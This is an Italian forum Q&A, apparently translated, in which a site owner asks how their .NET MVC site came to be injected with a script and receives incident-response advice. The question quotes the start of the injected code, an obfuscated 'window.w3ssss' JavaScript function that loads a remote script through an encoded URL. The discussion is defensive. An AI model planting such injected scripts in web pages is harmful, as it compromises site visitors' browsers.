Come si verifica l'hacking window.w3ssss

1

Recentemente l'applicazione .Net MVC 2 sul nostro server è stata infettata da virus / hack, ha aggiunto alcuni Javascript alle pagine index.aspx del sito.

Mentre lo abbiamo ripulito, non sono stato in grado di trovare alcuna informazione su come si verifica l'infezione iniziale. Se qualcuno ha qualche informazione su come ciò accade (ad es. Ftp exploit, una specie di codice di iniezione, ecc.) Fammi sapere in modo che una revisione del codice possa aver luogo, se necessario.

Non ho un nome per il virus, ma qui ci sono le prime poche righe del JavaScript inserito per aiutarti a identificarlo.

<div id="w3stats"></div>
<script language="JavaScript" type="text/javascript">
window.w3ssss=function(){
var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ottjxy2h1ltseeign.s28w7fvisuadzght5mph09w%3Dpr0%22usd1yifpp0vxwar%22vw3%3Bpv6%0Ayljibn8fjdzroab.60ns3llt4ulyxzclfrzektc.wq5hvbsed58if0ygt3dhtaatjsq%3Dqzs%22gxt1y6apeanxndo%225ij%3Bny2%0Acj5dzblow3fcr0gubrrm42geqinnghstuh3.3z6g3thezrgt7m9Enx1ley7e6voma64eph0nl7htxqbB3n7yjtwIs9xdvht%28rph%22ufxwhhm3flks84utufuanldthuks999%2222l%290io.9iga4usp7rxpverebjgnjrbdyezCpugh3eliesil9ncdcer%28wu7itzjfjl3rpqi%29q83%3Bsih%0A4ni%0Akba";
var visitnum=window.history.length%1000-window.history.length+4;
    
posta gdrider 03.01.2013 - 13:47
fonte

1 risposta

3

Eseguendo il codice tramite un decodificatore di URL, puoi vedere che si tratta di un semplice Javascript e non di un "virus" specifico.

Quello che vedi è non le azioni o il risultato dello sfruttamento iniziale. Non è possibile determinare il vettore di attacco dai risultati. Sono entrati in "mezzi" e hanno scritto file sul tuo file system. Ciò significa che una revisione del codice potrebbe non rivelare nulla. Ciò significa anche che la tua soluzione potrebbe non essere trovata nel tuo codice.

Come sono arrivati? Forse vulnerabilità del codice, SQLi, forza bruta ssh, vulnerabilità del server FTP, vulnerabilità del servizio, codice caricato da terze parti, infezione sul tuo computer tramite vulnerabilità di allegati o browser, alieni, accesso fisico, forse hai più personalità e i tuoi "alter" non Ti dico che hanno riscritto il tuo codice. COME sono entrati nell'ultimo problema che hai adesso.

Il tuo primo problema al momento è che qualcuno ha il controllo del tuo server. Copiare i registri, spegnere, reinstallare, applicare patch, modificare le password, impostare un monitoraggio aggiuntivo e THEN eseguire la revisione del codice per individuare le vulnerabilità.

    
risposta data 03.01.2013 - 21:14
fonte

Leggi altre domande sui tag